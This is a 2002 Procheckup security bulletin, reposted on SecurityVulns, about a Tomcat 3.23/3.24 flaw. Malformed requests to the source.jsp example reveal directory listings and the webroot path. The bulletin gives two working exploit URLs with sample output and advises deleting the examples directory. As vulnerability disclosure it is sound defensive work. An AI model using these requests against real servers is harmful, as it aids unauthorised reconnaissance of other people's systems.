Vulnerability in Apache Tomcat v3.23 & v3.24

2002-05-31T00:00:00
ID SECURITYVULNS:DOC:3002
Type securityvulns
Reporter Securityvulns
Modified 2002-05-31T00:00:00

Description

Procheckup Ltd

www.procheckup.com

Procheckup Security Bulletin PR02-05

Description: Tomcat source.jsp directory listing and

webroot location display

     Date: 8/1/2002

Application: Apache Tomcat Java server versions 3.23 and

3.24

 Platform: Linux/Unix

 Severity: Remote attackers can obtain listings of web

directories and sometines the location of webroot

  Authors: Richard Brain [richard.brain@procheckup.com]

Vendor Status:

CVE Candidate: Not assigned

Reference: www.procheckup.com/security_info/vuln.html

Description:

Tomcat is the free opensource Java server,

http://jakarta.apache.org/tomcat/.

Normally source.jsp is used to look at the source code of

programs within the examples directories. A typical

request is

http://webserver:80/examples/jsp/source.jsp?/jsp/num/numgues

s.jsp.

We have found by using source.jsp with a malformed input a

directory listing is displayed and the location of the

webroot is sometimes disclosed.

The vulnerabilities may only work on port 8080 rather than

port 80, dependant on how the webserver has been configured

with Tomcat.

Exploits

A) Requesting the following url :-

http://webserver:80/examples/jsp/source.jsp??

Gives the directory listing and webroot on 3.23, 3.24 just

gives a directory listing.

<title>Directory Listing</title>

<base

href="file://localhost/"WEBROOT"/webapps/examples/"><h1>/"WE

BROOT"/webapps/examples</h1>

<hr>

<img align=middle src="doc:/lib/images/ftp/directory.gif"

width=32 height=32>

<a href="images">images</a><br><img align=middle

src="doc:/lib/images/ftp/directory.gif" width=32 height=32>

<a href="jsp">jsp</a><br><img align=middle

src="doc:/lib/images/ftp/directory.gif" width=32 height=32>

<a href="META-INF">META-INF</a><br><img align=middle

src="doc:/lib/images/ftp/directory.gif" width=32 height=32>

<a href="servlets">servlets</a><br><img align=middle

src="doc:/lib/images/ftp/directory.gif" width=32 height=32>

<a href="WEB-INF">WEB-INF</a><br>

B) Requesting the following url :-

http://webserver:80/examples/jsp/source.jsp?/jsp/

Gives the directory listing and webroot on 3.23, 3.24 just

gives a directory listing on a subdirectory.

<title>Directory Listing</title>

<base

href="file://localhost/"WEBROOT"/webapps/examples/jsp/"><h1>

/"WEBROOT"/webapps/examples/jsp</h1>

<hr>

<img align=middle src="doc:/lib/images/ftp/directory.gif"

width=32 height=32>

<a href="cal">cal</a><br><img align=middle

src="doc:/lib/images/ftp/directory.gif" width=32 height=32>

<a href="checkbox">checkbox</a><br><img align=middle

src="doc:/lib/images/ftp/directory.gif" width=32 height=32>

<a href="colors">colors</a><br><img align=middle

src="doc:/lib/images/ftp/directory.gif" width=32 height=32>

<a href="dates">dates</a><br><img align=middle

src="doc:/lib/images/ftp/directory.gif" width=32 height=32>

<a href="error">error</a><br><img align=middle

src="doc:/lib/images/ftp/directory.gif" width=32 height=32>

<a href="forward">forward</a><br><img align=middle

src="doc:/lib/images/ftp/directory.gif" width=32 height=32>

<a href="include">include</a><br><img align=middle

src="doc:/lib/images/ftp/file.gif" width=32 height=32>

<a href="index.html">index.html</a><br><img align=middle

src="doc:/lib/images/ftp/directory.gif" width=32 height=32>

<a href="jsptoserv">jsptoserv</a><br><img align=middle

src="doc:/lib/images/ftp/directory.gif" width=32 height=32>

<a href="num">num</a><br><img align=middle

src="doc:/lib/images/ftp/directory.gif" width=32 height=32>

<a href="plugin">plugin</a><br><img align=middle

src="doc:/lib/images/ftp/directory.gif" width=32 height=32>

<a href="security">security</a><br><img align=middle

src="doc:/lib/images/ftp/directory.gif" width=32 height=32>

<a href="sessions">sessions</a><br><img align=middle

src="doc:/lib/images/ftp/directory.gif" width=32 height=32>

<a href="simpletag">simpletag</a><br><img align=middle

src="doc:/lib/images/ftp/directory.gif" width=32 height=32>

<a href="snp">snp</a><br><img align=middle

src="doc:/lib/images/ftp/file.gif" width=32 height=32>

<a href="source.jsp">source.jsp</a><br>

Solution:

Delete the samples directory if not needed.

  Legal:

Copyright 2002 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this

Bulletin

to the Internet community for the purpose of alerting

them to problems

, if and only if, the Bulletin is not edited or changed

in any way,

is attributed to Procheckup, and provided such

reproduction and/or

distribution is performed for non-commercial purposes.

Any other use of this information is prohibited.

Procheckup is not

liable for any misuse of this information by any third

party.